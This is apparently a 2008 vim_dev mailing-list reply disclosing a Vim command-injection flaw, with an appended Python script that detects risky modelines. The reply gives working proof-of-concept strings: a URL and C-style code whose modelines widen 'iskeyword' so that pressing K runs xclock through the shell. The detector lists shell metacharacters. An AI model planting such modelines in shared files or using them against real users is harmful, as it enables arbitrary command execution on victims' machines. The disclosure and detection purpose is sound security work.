On Wed, Aug 20, 2008 at 8:18 AM, Tony Mechelynck
<[EMAIL PROTECTED]> wrote:
>
> On 20/08/08 06:51, Jan Minář wrote:
> [...]
>> Opening the following URL using the K command will launch the
>> xclock(1x) program:
>>
>>      http://www.google.co.uk/search?q=&xclock&;
>
> Pasting this into the SeaMonkey location bar opens a Google page.
> Hitting K on it in gvim with 'keywordprg' set to "seamonkey" invokes
> ":!seamonkey http" which gives a page from the site http://www.http.com/
> In neither case do I see any xclock process, even though the program is
> in my $PATH.

You need to have 'iskeyword' set to a sensible value.  Sensible, that
is, for handling URLs.  A version using a modeline to set the
'iskeyword':

    http://www.example.com&xclock&;
    vim: iskeyword=58,?,#,[,],@,!,$,&,',(,),*,+,44,;,=,45,.,_,~,/,48-57,A-Z,a-z,%


>> But, of course, it's much worse:  Since the URL is inside a buffer, we
>> can assume the whole of the buffer can be controlled by the attacker.
>> They can use a modeline to set 'iskeyword' to contain any characters
>> needed for a particular shell command:
>>
>>      /* We use an obscure glibc function -- check out the man page! */
>>      clockface = (xclock&)pwnme(a, b, x + y);
>>      [...]
>>      /* vim:iskeyword:a-z,&,),(: */

The above will of course not work.  The following will:

    /* We use an obscure glibc function -- check out the man page! */
    clockface = &(xclock)&pwnme (a, b, x + y);
    /* :vim:iskeyword=a-z,&,),(: */

Cheers,
Jan.

--~--~---------~--~----~------------~-------~--~----~
You received this message from the "vim_dev" maillist.
For more information, visit http://www.vim.org/maillist.php
-~----------~----~----~----~------~----~------~--~---
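
A defensive check for the pattern discussed in this thread, added here as an example and not part of the original message or of Vim: it flags modelines that put shell metacharacters into 'iskeyword', which is what lets the word under the cursor reach the 'keywordprg' shell command intact. The regex is a loose heuristic rather than Vim's modeline parser; the function names and the `SHELL_META` set are assumptions, and the sample reuses the two modelines from the message plus one constructed benign line.

```python
import re

# Shell command separators / substitution characters (assumed set).
SHELL_META = set("&;|`$()<>")

# Heuristic: any vi:/vim:/ex: marker followed by an iskeyword assignment.
# Intentionally looser than Vim's real modeline parser, so it over-reports.
MODELINE = re.compile(r"(?:vi|[vV]im|ex):.*?\b(?:iskeyword|isk)[+^]?=([^\s:]+)")

# One 'iskeyword' item: a char or decimal char code, optionally a range.
ITEM = re.compile(r"(\d+|[^\d])(?:-(\d+|[^\d]))?")


def _code(tok):
    """Decimal tokens are character codes; anything else is a literal char."""
    return int(tok) if tok.isdigit() else ord(tok)


def keyword_chars(value):
    """Expand an 'iskeyword' value into the set of characters it enables."""
    chars = set()
    for item in value.split(","):
        m = ITEM.fullmatch(item)
        if not m or item == "@":      # "@" = alphabetic; "^x" exclusions skipped
            continue
        lo = _code(m.group(1))
        hi = _code(m.group(2)) if m.group(2) else lo
        chars.update(chr(c) for c in range(lo, min(hi, 255) + 1))
    return chars


def risky_modelines(text):
    """Return (line number, metacharacters) for each suspicious modeline."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = MODELINE.search(line)
        if m:
            meta = keyword_chars(m.group(1)) & SHELL_META
            if meta:
                findings.append((lineno, "".join(sorted(meta))))
    return findings


# Lines 2 and 3 are the modelines from the message; line 4 is constructed.
SAMPLE = """\
http://www.example.com&xclock&;
vim: iskeyword=58,?,#,[,],@,!,$,&,',(,),*,+,44,;,=,45,.,_,~,/,48-57,A-Z,a-z,%
/* :vim:iskeyword=a-z,&,),(: */
# vim: set iskeyword=@,48-57,_ :
"""

if __name__ == "__main__":
    for lineno, meta in risky_modelines(SAMPLE):
        print(f"line {lineno}: iskeyword admits shell metacharacters {meta!r}")
```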
